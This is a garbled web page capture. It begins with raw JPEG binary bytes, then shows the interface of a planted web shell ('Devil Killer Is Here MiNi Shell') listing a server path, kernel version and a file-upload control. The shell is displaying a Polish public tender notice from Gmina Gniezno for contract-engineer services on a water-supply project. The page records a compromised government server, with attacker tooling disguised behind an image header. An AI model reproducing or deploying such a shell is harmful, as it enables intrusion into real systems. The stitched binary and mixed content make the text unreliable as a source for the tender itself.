JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241205/0063664701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji Inżyniera kontraktu dla zadania „Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-wschodniej części gminy” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GNIEZNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259519</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleje Władysława Stanisława Reymonta 9-11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gniezno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">614245750</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">614245751</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@urzadgminy.gniezno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://urzadgminy.gniezno.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji Inżyniera kontraktu dla zadania „Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-wschodniej części gminy” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2cccb82f-f9ae-4b39-a518-7d8bf71e21a2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00636647</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00002595/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Pełnienie funkcji Inżyniera kontraktu dla zadania „Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-wschodniej części gminy&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1032465 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1032465</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/transakcja/1032465 opcja &#34;Wyślij wiadomość do zamwawijącego&#34;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Gniezno;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem<br/>e-mail: iod@lesny.com.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO, zgodnie z przepisami<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej Pzp), w celu prowadzenia<br/>przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również<br/>zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania<br/>postępowania o udzielenie zamówienia publicznego i jego archiwizacji;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 i art. 74 ustawy Pzp oraz inne podmioty, które przetwarzają<br/>dane osobowe na podstawie stosownych umów zawartych<br/>z Administratorem (np. podmioty świadczące usługi informatyczne)<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; następnie dane przechowywane będą przez okres<br/>wskazany w instrukcji kancelaryjnej oraz jednolitym rzeczowym wykazie akt na podstawie art. 6 ustawy<br/>z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach,<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego. Konsekwencją ich niepodania jest przede wszystkim brak możliwości<br/>wzięcia udziału w postępowaniu o udzielenie zamówienia publicznego; inne konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego<br/>wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa<br/>do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP<br/>oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>3<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSOP.271.52.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest pełnienie funkcji Inżyniera kontraktu dla zadania „Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-<br/>wschodniej części gminy Gniezno”. Szczegółowy zakres obowiązków zawiera Opis przedmiotu zamówienia stanowiącym załącznik do niniejszej SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71521000-6 - Usługi nadzorowania placu budowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami Cena = 100%;<br/>2. Ocena ofert dokonywana będzie według następujących wzorów: 1% = 1 pkt.<br/>15<br/>3. Kryterium „Cena” (C) – 100 % (maksymalnie 100 pkt)<br/>C = Cena (wartość do dwóch miejsc po przecinku):<br/>cena najniższej oferty*<br/>C= ------------------------------------------- x 100%<br/>cena badanej oferty<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>Ocena kryterium dokonana zostanie w odniesieniu do ceny brutto, Za najkorzystniejszą zostanie uznana<br/>oferta, która uzyska najwyższą liczbę punktów przyznanych w kryterium ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa<br/>w art. 112 ustawy Pzp i którzy wykażą ich spełnianie na poziomie wymaganym przez<br/>Zamawiającego zgodnie z opisem zamieszczonym poniżej.<br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>1.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający wymaga aby wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności gospodarczej do kwoty minimum 1 000 000,00 zł (w przypadku wspólnego<br/>ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich<br/>łączna sytuacja ekonomiczna i finansowa – w tym celu dokumenty ma obowiązek złożyć ten lub<br/>ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku).<br/>1.4. zdolności technicznej lub zawodowej:<br/>W zakresie spełnienia warunku wymagane jest wykazanie przez Wykonawcę, że spełnia łącznie<br/>następujące warunki:<br/>1.4.1 wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert,<br/>a w przypadku gdy okres prowadzenia działalności jest krótszy w tym okresie:<br/> co najmniej jedną usługę inżyniera w okresie od rozpoczęcia robót do odbioru końcowego<br/>lub przejęcia przez zamawiającego dla inwestycji polegającej na zaprojektowaniu<br/>wykonaniu studni głębinowej (jedna lub kilka). Minimum jedna z inwestycji dotyczyła<br/>studni o wydajności eksploatacyjnej pojedynczej studni Qmaxh co najmniej 40m3/h,<br/> co najmniej jedna usługa inżyniera przy zaprojektowaniu i budowie lub przebudowie lub<br/>rozbudowie stacji uzdatniania wody w okresie od rozpoczęcia prac projektowych do<br/>zakończenia robót i odbioru końcowego lub przejęcia przez zamawiającego, każda<br/>obejmująca budynek, napowietrzanie lub filtry, instalacje elektryczne i akpia, drogi<br/>wewnętrzne, zagospodarowanie terenu - o wydajności każdej stacji co najmniej 1000 m3/d.<br/> co najmniej jedną usługę nadzoru lub wykonania projektu, wdrożenia i kalibracji modelu<br/>hydraulicznego sieci wodociągowej lub kanalizacyjnej (sanitarnej/deszczowej/<br/>ogólnospławnej) wraz z min 5 punktami pomiarowymi stałymi lub tymczasowymi,<br/>5<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki<br/>dotyczące doświadczenia określone powyżej Wykonawcy mogą spełniać łącznie.<br/>1.4.2 dysponuje lub będzie dysponował następującymi osobami które będą uczestniczyć w wykonaniu<br/>zamówienia:<br/> jedną osobą wykonującą czynności Kierownika zespołu, co najmniej 3 lata doświadczenia<br/>jako kierownik zespołu Inżyniera, która w ciągu ostatnich 3 lat przed upływem terminu<br/>składania ofert pełniła funkcję kierownika zespołu przy budowie lub przebudowie co<br/>najmniej jednego zadania dotyczącego zaprojektowania i wykonania stacji uzdatniania wody<br/>w tym jedna o wydajności min 1000m3/d;<br/> jedną osobą wykonującą czynności Specjalisty ds. rozliczeń, posiadającą następujące<br/>kwalifikacje: łącznie co najmniej 2 lata doświadczenia zawodowego w rozliczaniu robót<br/>budowlano-montażowych, w tym pełnienie funkcji specjalisty ds. rozliczeń na co najmniej<br/>jednym zadaniu o wartości co najmniej 4.000.000,00 zł brutto;<br/> jedną osobą wykonującą czynności Prawnika, posiadającą następujące kwalifikacje: radca<br/>prawny/adwokat, łącznie co najmniej 2 lata doświadczenia zawodowego w obsłudze prawnej<br/>inwestycji w gospodarce wod.-kan., w tym co najmniej jednego zadania o wartości co<br/>najmniej 4.000.000 zł brutto;<br/> jedną osobą pełniąca funkcję Technologa oczyszczania wody, która będzie uczestniczyć<br/>w wykonywaniu zamówienia, która posiada co najmniej 2-letnie doświadczenie zawodowe,<br/>uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności instalacyjnej<br/>w zakresie sieci, instalacji urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych<br/>i kanalizacyjnych, zdobyte jako technolog przy zadaniu polegającym na budowie lub<br/>przebudowie lub rozbudowie stacji uzdatniania wody o przepustowości projektowej nie<br/>mniejszej niż Qmaxd 1000 m3/d;<br/> jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności inżynieryjnej sanitarnej bez ograniczeń, która pełniła przez co najmniej 2 lata<br/>funkcję Inspektora Nadzoru (w rozumieniu ustawy Prawo budowlane) w specjalności<br/>inżynieryjnej sanitarnej przy realizacji co najmniej 2 zadań inwestycyjnych obejmujących<br/>budowę lub przebudowę stacji uzdatniania wody o wartości każdego zadania co najmniej<br/>4 000 000 zł brutto w tym co najmniej jedna w trybie zaprojektuj i wybuduj,<br/> jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi<br/>w specjalności konstrukcyjnej bez ograniczeń, która pełniła funkcję Inspektora Nadzoru<br/>(w rozumieniu ustawy Prawo budowlane) w specjalności inżynieryjnej konstrukcyjnej przy<br/>realizacji co najmniej 2 zadań inwestycyjnych obejmujących budowę lub przebudowę stacji<br/>uzdatniania wody o wartości każdego zadania co najmniej 4 000 000 zł brutto w tym co<br/>najmniej jedna w trybie zaprojektuj i wybuduj,<br/> jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności inżynieryjnej drogowej, która pełniła funkcję Inspektora Nadzoru (w<br/>rozumieniu ustawy Prawo budowlane) w specjalności inżynieryjnej drogowej przy realizacji<br/>co najmniej 2 zadań inwestycyjnych obejmujących budowę lub przebudowę dróg,<br/> jedną osobą posiadającą uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, która pełniła<br/>funkcję Inspektora Nadzoru (w rozumieniu ustawy Prawo budowlane) w specjalności<br/>elektrycznej przy realizacji co najmniej 2 zadań inwestycyjnych obejmujących budowę lub<br/>przebudowę stacji uzdatniania wody o wartości każdego zadania co najmniej 4 000 000,00<br/>zł brutto w tym co najmniej jedna w trybie zaprojektuj i wybuduj,<br/> jedną osobą posiadającą uprawnienia budowlane bez ograniczeń w specjalności:<br/>teletechnicznej, która pełniła funkcję Inspektora Nadzoru (w rozumieniu ustawy Prawo budowlane) w specjalności teletechnicznej przy realizacji co najmniej 2 zadań inwestycyjnych obejmujących budowę lub przebudowę stacji uzdatniania wody o wartości<br/>każdego zadania co najmniej 4 000 000,00 zł brutto w tym co najmniej jedna w trybie<br/>zaprojektuj i wybuduj,<br/> jedną osobą posiadającą wykształcenie wyższe na kierunku inżynieria środowiska lub<br/>związane z systemami informatycznymi, doświadczenie w nadzorowaniu wdrożenia co<br/>najmniej jednego modelu hydraulicznego dla sieci wodociągowej na terenach wiejskich.<br/>Zakres nadzoru obejmował przygotowaniu koncepcji/projektu systemu, wykonanie modelu,<br/>kampanię pomiarową z kalibrację, testy i uruchomienie systemu informatycznego do obsługi<br/>modelu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz oświadczeń wymaganych od Wykonawcy, w celu potwierdzenia braku podstaw<br/>wykluczenia z postępowania:<br/>1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniach, o których<br/>mowa w ppkt 2 rozdziału X SWZ, którego wzór stanowi załącznik nr 5 do SWZ;<br/>2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej: składa oświadczenie, o którym mowa w ppkt 3.2.1) rozdziału XI SWZ;<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie,<br/>o którym mowa w ppkt. 3.2.1) rozdziału X SWZ, składa odrębnie każdy z Wykonawców;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych (oświadczeń lub dokumentów) wymaganych od<br/>Wykonawcy, w celu spełniania warunków udziału w postępowaniu:<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>sytuacji ekonomicznej lub finansowej Zamawiający żąda następujących dokumentów:<br/>- dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia.<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej Zamawiający żąda następujących dokumentów:<br/>- Wykaz usług (wg wzoru – Załącznik nr 7 do SWZ) wykonanych, a w przypadku świadczeń<br/>powtarzających się lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały<br/>wykonane lub są wykonywane oraz załączeniem dowodów określających czy te usługi zostały<br/>wykonane należycie lub są wykonywane należycie, przy czym dowodami, o których mowa, są:<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz, którego usługi zostały wykonane<br/>a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych 